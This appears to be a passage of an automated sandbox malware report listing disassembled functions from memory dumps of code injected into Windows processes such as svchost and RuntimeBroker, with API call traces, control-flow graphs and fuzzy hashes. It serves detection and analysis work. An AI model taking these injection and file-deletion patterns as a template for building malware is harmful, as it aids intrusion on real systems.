                                                                                                                                                                control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 846 1c2a71-1c2a86 call 1c26f9 844->846 851 1c2ade-1c2af5 call 1c2683 845->851 852 1c2ab3 845->852 846->845 855 1c2a88 846->855 860 1c2af8-1c2b11 call 1c2e97 851->860 861 1c2af7 851->861 852->851 853 1c2ab5-1c2aca call 1c26f9 852->853 853->851 862 1c2acc 853->862 855->845 858 1c2a8a-1c2a94 DeleteFileA 855->858 858->845 866 1c2b34-1c2b48 Sleep 860->866 867 1c2b13-1c2b1c call 1c3057 860->867 861->860 862->851 864 1c2ace-1c2ad8 DeleteFileA 862->864 864->851 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                  • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                  • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4261675396-0
                                                                                                                                                                • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
                                                                                                                                                                • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022A2A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,022A2A2F), ref: 022A2A3E
                                                                                                                                                                  • Part of subcall function 022A2B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 022A2C68
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AB8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 022A2AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 022A2B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 022A2B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531250245-0
                                                                                                                                                                • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction ID: d229d869cd74174b3f890d6bc478ec157ff561b824f05d0819012b64cdf8d9b4
                                                                                                                                                                • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction Fuzzy Hash: 05316571410358DFDB226FB08C58FAF76BCFF40708F4009A5AE45E6458DB349584CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C2A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                  • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531250245-0
                                                                                                                                                                • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022A31EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 022A320E
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 022A324C
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,022A31D9,00000011,?,00000000,00000000), ref: 022A3279
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,022A31D9,00000011,?,00000000,00000000,00000000,022A3092,00000004,00000000), ref: 022A3285
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,022A31D9,00000011,?,00000000,00000000,00000000,022A3092,00000004,00000000), ref: 022A3291
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3387338972-0
                                                                                                                                                                • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction ID: 267344093a99424d6ce2f4ce6578cba88b96d3994db148ecfbd55175b9fbb11d
                                                                                                                                                                • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction Fuzzy Hash: A81124724106189FDF12AFA0CC58ADFB7FDEF40705F014595E985EA408DA309A90CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C31C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3387338972-0
                                                                                                                                                                • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C0B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 273847653-0
                                                                                                                                                                • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 022A3F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,022A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 022A3F51
                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,?,022A3F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 022A3F6F
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 022A3F7F
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 022A3F8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction ID: 8f772a089a96ac62b09fb66feef1c4023350abf41f9ac3f374c59a2d0b2ae649
                                                                                                                                                                • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction Fuzzy Hash: C9F01C705783509BFB40BFF08C6D64A3AB9AF00704F0400D1AA89ED89ECF7490508E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C3EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1927384104.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                • String ID: j
                                                                                                                                                                • API String ID: 4133054770-2747090070
                                                                                                                                                                • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 003D0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.2886605765.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_3d0000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 37606bd29bffd8747609349bc4e3a59d52761269dbb140b3fc6ccf4b2a91a728
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: DF31D4734102047FEB077B70AD46BBA3BACEF11700F000167BD95DE2A6EA7449649AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00900811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000017.00000002.2818202841.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_23_2_900000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00181D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000018.00000002.2883062494.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: f7edfa1d29ee3a2f15c71f23f1afa3dacc25a52c64f2328ccefa2793ada852ba
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: 1121E531A34C1D0BEB58B27C9859764F6D6E79C320F980295E90DD36E4ED58CC8287C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00180811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000018.00000002.2883062494.0000000000180000.00000040.00000001.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_24_2_180000_ApplicationFrameHost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 5f0a2bf08c062a83ee58e576ca9a39c726153a08bf7c3d9358f7d983c0235e19
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 7331B6724102087FEB427F709D46ABA376CEF26310F440165BD85DA0A6EB744BA9CFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00190811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001A.00000002.2878821569.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_26_2_190000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 623531ca5508d48381e8169b3b0e04df07f96b68e4b13c9decdab74f5fa118bc
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: F131F772510205BFEF027F709D46ABA3BACEF25300F400565BD85DA0A2EB744DA4CBB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00011D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001C.00000002.2884175132.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: 9f39b5367da6598aeeb1998e776373a994835cae58933e0181d4283a84448e61
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: 6021F930B34C1D0BEB5CA27C98597A4F6E2E79C320F940295EA0DD36D4ED58CC8183C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00010811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 11 10811-10846 call 1086e 14 10848-10851 11->14 15 108ad-108ae 11->15 16 10853-1085c 14->16 17 108af-108b0 14->17 15->17 18 108d0-108d7 call 108d9 16->18 19 1085e 16->19 28 108d9-1090f call 10cc4 call 114bc call 10643 call 10ce8 18->28 20 10860-10861 19->20 21 108c5-108cc 19->21 23 10863 20->23 24 108b9-108c2 call 11756 call 11e62 20->24 21->18 27 10866-1086f 23->27 23->28 24->21 31 10871-10897 27->31 32 1089e-108a4 27->32 45 10911-1091a call 11756 call 11e62 28->45 46 10939 call 1093e 28->46 31->32 32->15 51 1091f-10933 SleepEx RtlExitUserThread 45->51 51->46
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001C.00000002.2884175132.0000000000010000.00000040.00000001.00020000.00000000.sdmp, Offset: 00010000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_28_2_10000_UserOOBEBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 6daea8f8473804d12748bca0b7204fc4a623126665c209879b0ad2024dc0075f
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 8231B6724142046FEB017BB09D4AAFA7BACEF11310F044165BDC5DA0A7DEB449D5CBB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 000D0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001D.00000002.2885240702.00000000000D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_29_2_d0000_svchost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: e07ed74e5cc9ac58003678b7d18a2ed3e8e34b21eca328e534d94c088b93a5ac
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 3431D2724103047FEB017B709D8ABFA7BACEF11300F000167BD89DA2A3EE7449649AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00260811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001E.00000002.2878758310.0000000000260000.00000040.00000001.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_30_2_260000_dllhost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 9ec0f4c8c139119009ddabdc2b4aa269233a87e76af611ef1baa78d60f79bf3b
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 1731E8724202056FEB01BF709D86ABB776CEF11300F040165BD85DA0A6EA744DF4DBB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 04D8093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 4d8093e-4d8095f call 4d80cc4 call 4d814bc call 4d83cc0 8 4d80967-4d80989 0->8 10 4d8098f-4d809d2 call 4d809d9 8->10 11 4d80af1-4d80af2 8->11 15 4d80a3d-4d80a76 10->15 16 4d809d4-4d809d5 10->16 17 4d80a7e-4d80a80 15->17 18 4d80a3c 16->18 19 4d809d7-4d809e8 call 4d83653 16->19 20 4d80aec call 4d80af3 17->20 21 4d80a82-4d80aae 17->21 18->15 19->20 29 4d809ee-4d80a10 19->29 20->11 21->20 27 4d80ab0-4d80abc 21->27 31 4d80ac1-4d80ae5 27->31 29->20 34 4d80a16-4d80a3b 29->34 31->11 37 4d80ae7-4d80aea 31->37 34->20 38 4d80a41-4d80a76 34->38 37->20 37->31 38->17
                                                                                                                                                                Memory Dump Source
